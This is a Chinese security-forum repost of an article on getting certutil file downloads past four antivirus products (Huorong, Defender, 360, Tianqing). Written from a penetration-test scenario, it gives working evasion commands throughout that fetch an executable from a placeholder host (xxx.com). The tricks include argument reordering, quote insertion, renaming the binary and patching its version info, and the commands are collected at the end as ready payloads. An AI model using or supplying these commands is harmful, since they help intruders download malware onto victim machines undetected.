安全矩阵

 找回密码
 立即注册
搜索
查看: 1864|回复: 0

干货 | 从Certutil下载绕过探究常见杀软的绕过思路

[复制链接]

189

主题

191

帖子

903

积分

高级会员

Rank: 4

积分
903
发表于 2022-5-31 20:08:37 | 显示全部楼层 |阅读模式
本帖最后由 margin 于 2022-5-31 20:10 编辑

原文链接:干货 | 从Certutil下载绕过探究常见杀软的绕过思路 (qq.com)

0X00 前言

在之前某个项目中,遇到一个只能用ms17-010-command打的Windows Server 2008 R2,每次执行输入一条命令,有些特殊符号还不能带入,这台服务器上也有开了核晶防护引擎的360安全卫士,当时简单试了一下添加管理员用户的绕过没成,看来还是得下一个exe进行多人运动。网络上找了一些下载命令变形发现都被拦了,于是本地测试了一下,项目后也顺便测试其他杀软检测效果,我们以常见的certutil为例(其他带下载功能的系统exe绕过思路都是相通的)来探究一下国内常见的杀软的绕过思路。

0X01 Certutil介绍

首先简单介绍一下Windows系统自带certutil:
certutil.exe是作为证书服务的一部分安装的命令行程序。可以使用certutil.exe转储和显示证书颁发机构 (CA) 配置信息、配置证书服务、备份和还原 CA 组件,以及验证证书、密钥对和证书链。
更多可以参考微软官方的介绍:


https://docs.microsoft.com/zh-cn/windows-server/administration/windows-commands/certutil

我们一般利用certutil下载文件,常见命令为:


certutil -urlcache -split -f http://xxx.com/evil.exe

这里简单介绍一下参数:

  •         -urlcache 显示或删除URL缓存条目。无值的命令行选项。
  •         -f 覆盖现有文件。有值的命令行选项。后面跟要下载的文件 url。
  •         -split 保存到文件。无值的命令行选项。加了的话就可以下载到当前路径,不加就下载到了默认路径。
另外以下命令也是可以正常下载的:



certutil -urlcache -f http://xxx.com/evil.exe dns.exe

0X02 绕过过程

0X03    火绒绕过

测试环境:win11 x64 物理机 火绒 5.0.68.1 默认配置

编辑


火绒对默认的下载的语句会拦截。



certutil -urlcache -split -f http://xxx.com/dns.exe
编辑
我们尝试随便添加不存在的-a参数,可以看到火绒也是要拦的。



certutil -urlcache -split -f http://xxx.com/dns.exe -a
编辑
那我们尝试换过一下参数位置,可以火绒不拦截了。



certutil -urlcache -split -a -f http://xxx.com/dns.exe
编辑
我们只要-a参数换为不影响下载功能的参数即可绕过火绒。



certutil -urlcache -split -gmt -f http://xxx.com/dns.exe
编辑
从上面测试过程大概推测出火绒是基于正则语句规则进行匹配语句的,基于静态的规则匹配比较鸡肋,我只要稍微变形一下语句不让其不匹配到即可绕过,比如在-split参数前面多加一个空格就绕过了,大家可以随意发挥。



certutil -urlcache -split -f http://xxx.com/dns.exe



编辑

0X04 Defender绕过

测试环境:win10 x64 物理机 Windows Defernder 4.18.2203.5-0 默认配置
编辑
我们对首先使用默认下载语句测试一下Defernder,可以看到是被Denferder检测到了,而且我们尝试在参数后面加一些干扰字符也无用。
编辑
那我们尝试对参数做一下变形呢,在Windows cmd中有些字符串是不影响命令原意的,比如^和"。
编辑
那我们可以利用这一特性尝试绕过。



certutil -url""""cache -split -f http://xxx.com/dns.exe
编辑
可以从上图看到当我们在urlcache参数里加入2组""即可绕过Denfender的检测,可以分析出Denfender不只是简单匹配命令语句,也会动态检查运行命令的参数。

0X05     360绕过

测试环境:物理机 win10 x64 360安全卫士 13.0.0.2003 防护全开 开启核晶防护引擎
编辑
从以往的经验来看,360安全卫士的物理机防护和查杀效果都比虚拟机要强,所以这次我们就用物理机来测,先简单测试一下命令变形,可以看到都被拦截了。
编辑
那我们试着把参数减少看看情况。
编辑
可以看到我们即使参数缩短到不正常工作的命令行也会拦截,对其参数再怎么变形都无用,有点变态,综上可以看出来是对certutil运行参数进行了动态检测,只要动态执行后的参数有-urlcache就拦截。
既然对certutil检测那么严,那我们换换思路,给certutil换个路径和文件名看看。



copy c:\windows\system32\certutil.exe c.exe
编辑
可以看到执行c -urlcache不再拦截了,说明思路可行,那我们再次加上其他参数看看情况呢,可以看到成功绕过。



c -urlcache -split -f http://xxx.com/dns.exe
编辑

0X06 天擎绕过

测试环境:虚拟机 win7sp1 x64 天擎 v10.3.0.2009 防护全开

编辑


首先还是先测试一下命令参数变形的情况,可以看到都拦截了。
编辑
我们再加入更复杂的变形也不行。
编辑
试一下过360的思路,还是被拦了。
编辑
既然有静态的参数urlcache就被拦,那动态拼接出参数urlcache呢?
我们用set命令进行赋值,把参数urlcache进行拆分,然后用call命令来调用,用%a1%格式来拼接出参数urlcache,可以到看到还是被拦了,看来天擎是程序运行后再获取到实际的参数再做匹配的,可以,很强。
编辑
测到这里看来普通的参数字符变形是行不通的,我们换换思路,加入其他的命令进行变形看看情况呢。
编辑
还是被拦了,不过看之前的拦截信息,父进程来源都是cmd.exe,那我们试一下改变其父进程呢,改变其进程链,使用pcalua启动certutil。
编辑
好家伙,尝试使用其他方式调用certutil还是不行,估计是不管其启动父进程,只要天擎识别到启动的是certutil并且带有urlcache参数就会拦截。
既然这样,那我们思路就有了,只要让天擎不识别到为certutil是不是就可以绕过了,首先想到的天擎可能是根据程序的哈希值进行识别的,那我们尝试改变certutil的hash试试,把calc.exe附加到certutil的后面,这样既改变了certutil的hash而且也不影响certutil的正常执行。
编辑
可以看到,从拦截信息来看还是把new识别为certutil,我们看一下new的版本信息也还是certutil的。
编辑
所以推测杀软是根据程序版本信息进行识别的,我们尝试修改程序版本信息看看能否绕过。
为了验证这个思路,网上找了一圈没有发现系统自带的命令可以修改程序版本信息,无奈之下找到一个三方的小巧好用的修改工具verpatch,经过测试只需要修改程序版本信息中InternalName字段的值,这里我们InternalName修改为空看看情况。



verpatch.exe c.exe /s InternalName ""
编辑
可以看到天擎已经不识别为certuitl了,正常的下载也不再拦截了。
编辑
不过到这里我们已经借助了三方工具来修改程序元数据,所以此时的绕过意义已经不大了,只能说明这个绕过思路是可行的,在一些其他场景可以发挥作用。

0X07    绕过操作的payload

火绒绕过(随意发挥)

  1. certutil -urlcache  -split -f http://xxx.com/dns.exe
  2. certutil -urlcache -split -gmt -f http://xxx.com/dns.exe
  3. certutil -url""cache -split -f http://xxx.com/dns.exe
复制代码


Defender绕过
  1. certutil -url""""cache -split -f http://xxx.com/dns.exe
复制代码

360绕过

  1. certutil|certutil -urlcache split -f http://xxx.com/dns.exe
  2. copy c:\windows\system32\certutil.exe c.exe
  3. c -urlcache -split -f http://xxx.com/dns.exe
复制代码


天擎绕过

  1. copy c:\windows\system32\certutil.exe c.exe
  2. verpatch.exe c.exe /s InternalName ""
  3. certutil -urlcache  -split -f http://xxx.com/dns.exe
复制代码


0X08
测试结果


测试时间:2022年5月24-26日
                        测试环境
                        
                        杀软
                        
                        版本
                        
                        能否绕过
                        
                        win10 物理机
                        
                        火绒
                        
                        5.0.68.1
                        
                        可以
                        
                        win11 物理机
                        
                        Windows Defender
                        
                        4.18.2203.5-0
                        
                        可以
                        
                        win10 物理机
                        
                        360安全卫士
                        
                        13.0.0.2003
                        
                        可以
                        
                        win7 sp1 虚拟机
                        
                        天擎
                        
                        v10.3.0.2009
                        
                        特定场景可以
                        

0X09 后话

在测试天擎后,询问团队里大佬有无姿势,大佬反手就是一发绕过命令,原理还是urlcache进行变形,因为不管怎么样杀软获取到实际参数还是要做正则匹配,那我们只要加一些既不影响命令原意又能打断正则匹配的符号就行了,大家往这个方向fuzz也可以达到目的。
在测试天擎后,询问团队里大佬有无姿势,大佬反手就是一发绕过命令,原理还是urlcache进行变形,因为不管怎么样杀软获取到实际参数还是要做正则匹配,那我们只要加一些既不影响命令原意又能打断正则匹配的符号就行了,大家往这个方向fuzz也可以达到目的。




回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-28 20:51 , Processed in 0.015868 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表